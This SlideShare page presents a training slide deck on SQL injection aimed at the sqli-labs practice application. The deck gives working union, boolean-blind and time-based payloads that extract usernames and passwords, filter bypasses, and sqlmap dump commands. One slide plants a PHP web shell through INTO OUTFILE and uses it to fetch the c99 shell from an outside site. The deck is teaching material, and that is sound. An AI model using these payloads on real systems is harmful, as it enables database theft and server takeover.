Practical Approach towards SQLi ppt

1,976 views
1,824 views

Published on

Sql injection , types of sqli injection , hands on

Published in: Technology
0 Comments
6 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,976
On SlideShare
0
From Embeds
0
Number of Embeds
123
Actions
Shares
0
Downloads
328
Comments
0
Likes
6
Embeds 0
No embeds

No notes for slide

Practical Approach towards SQLi ppt

  1. 1. Sqli Injection
  2. 2. #whoami Ahamed Saleem @saleem14489 #Security Researcher @CDAC
  3. 3. ● What is Sql Injection ● Types of sql injection – Error based Injection ( String, numeric, Union, error ) – Time based Blind SQLi – Boolean based Blind SQLi – Cookie based Injection – Compromising Database server using SQLi (upload a shell) – Exploitation using SQLmap – Bypass filters to successfully exploit SQLi . Agenda
  4. 4. Baa, baa, black hat Have you any sploits? Yes, sir, yes, sir 3 bulletproof choices One for Java One for IE One for Chrome (ha ha ha )
  5. 5. ➔ Structured Query Language designed for managing data held in a relational database management systems (RDBMS). ➔ The scope of SQL includes data insert, update and delete, schema creation and modification, and data access control. What Is Sql ?
  6. 6. Definition Of Sql Injection Def : “SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands” Cause: It is a flaw in “web application development “ , it is not a DB or web server problem → most programmers are still not aware of this problem → lot of solutions posted on the internet are not good enough
  7. 7. Anatomy Of Sql Injection Sql Injection Error Based Blind Based Boolean Based Time Based
  8. 8. © C-DAC, Hyderabad - 2013 SQL Injection – Illustrated Firewall Hardened OS Web Server App Server Firewall Databases LegacySystems WebServices Directories HumanResrcs Billing Custom Code APPLICATION ATTACK NetworkLayerApplicationLayer Accounts Finance Administration Transactions Communication KnowledgeMgmt E-Commerce Bus.Functions HTTP request SQL query DB Table   HTTP response   "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query Account Summary Acct:5424-6066-2134-4334 Acct:4128-7574-3921-0192 Acct:5424-9383-2039-4029 Acct:4128-0004-1234-0293 4. Database runs query containing attack and sends encrypted results back to application 5. Application decrypts data as normal and sends results to the user Account: SKU: Account: SKU:
  9. 9. OWASP Top 10
  10. 10. Myth Escaping input Prevents Sql Injection Sql Injection is an old problem - So I dont have to worry about it
  11. 11. Error Based Injections Error-based SQL injections are primarily those in which the SQL server dumps some errors back to the user via the web application and this error aids in successful exploitation
  12. 12. A methodological approach is always helpful in understanding the underlying logic. The major process is as follows: 1.Enumerate the application behavior 2.Fuzz the application with bogus data with the goal of crashing the application 3.Try to control the injection point by guessing the query used in the back-end 4. Extract the data from the back end database Enough theory, time for some action. Demo
  13. 13. ● Id = 1' --+ ● id=1' AND 1=1 --+ ● id=1' union select 1,2,3 --+ ● id=999' union select 1,2,3 --+ ● id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+ ● id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ ● id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ ● id=-1' union select 1,group_concat(username), group_concat(password) from users --+
  14. 14. Blind Injections Blind SQL injections are those injections in which the backend database reacts to the input, but somehow the errors are concealed by the web application and not displayed to the end users Boolean Based : The information must be inferred from the behavior of the page by asking the server true/false questions Time Based : Gain information by observing timing delays in the response of the database
  15. 15. Boolean Based Injections select ascii(substr(database(),1,1)); id=1' AND (ascii(substr((select database()),3,1))) = 99 --+ id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
  16. 16. Time based Injections id=1' and if((select database()="security"), sleep(10),null) --+ id=1' and if ((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1 ) ='e' , sleep(10) , null)--+
  17. 17. Uploading shell http://localhost/sqli-labs-master/Less-1/?id=-1' union select "","","<?system($_REQUEST['cmd'];?>" into outfile '/var/www/shell.php' --+ http://localhost/shell.php? cmd=wget http://www.r57shell.net/shell/c99.txt
  18. 18. SqlMap detects and expolits SQLi flaws Features : ● Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server ● Three SQL Injection techniques : ● Boolean-based ● Union queries ● Batched queries ● Perform an extensive back-end DBMS fingerprint
  19. 19. ● Enumerate users, password hashes, privileges, databases, tables, columns and their data-type ● Dump entire or user specified database table entries ● Run custom SQL statements SqlMap detects and expolits SQLi flaws
  20. 20. Dishum Dishum usingSQLMAP
  21. 21. – First detect the vulnerable URLS – Now use sqlmap : 1 . python sqlmap.py –u http://site.com/?id=1 {Identify sqli is present or not } 2 . python sqlmap.py -u http://site.com/?id=1 --dbs {Discover databases} 3./sqlmap -u http://site.com/?id=1 --tables -D <db name> {table in db} 4./sqlmap -u http://site.com/?id=1 --columns -D <db name> -T <table name> 5./sqlmap -u http://site.com/?id=1 --dump -D <db name> -T <table name>{data
  22. 22. Uploading Shell Using SQLMap : 1. Check if the current user is DBA or not . ./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user –is-dba 2.now enter the webserver path ./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-cmd -v 1 3. now the webshell can be loaded using the sqlmap file stager . DEMO
  23. 23. ByPassing the blacklist Filters Bypass AND and OR : Id=1' || 1=1 --+ id=1' %26%26 1=1 --+
  24. 24. Hands On
  25. 25. Methodology ● Break it – Try to break the query by fuzzing ● Fix it – Now based on the error try to balance and fix the query
  26. 26. © C-DAC, Hyderabad - 2013 ✔ What is Sql Injection ✔ Types of Sql Injection ✔ Hands on What did we cover?
  27. 27. © C-DAC, Hyderabad - 2013 * Websites and References OWASP, WASC, MSDN * Books and Mailing Lists Web Application Hackers Handbook, OWASP Guides * Tools to use Burp, Paros, Firefox Extensions, Virtual Box, Linux What did we cover?Further Roadmap
  28. 28. © C-DAC, Hyderabad - 2013 Acknowledge ● @Sqlilabs ● @Google ● @Nullhyd ● @cswan ● @thenounproject
  29. 29. © C-DAC, Hyderabad - 2013 Thank U @saleem14489 Facebook.com/ahamedssaleem Saleem4u.ahamed@gmail.com

×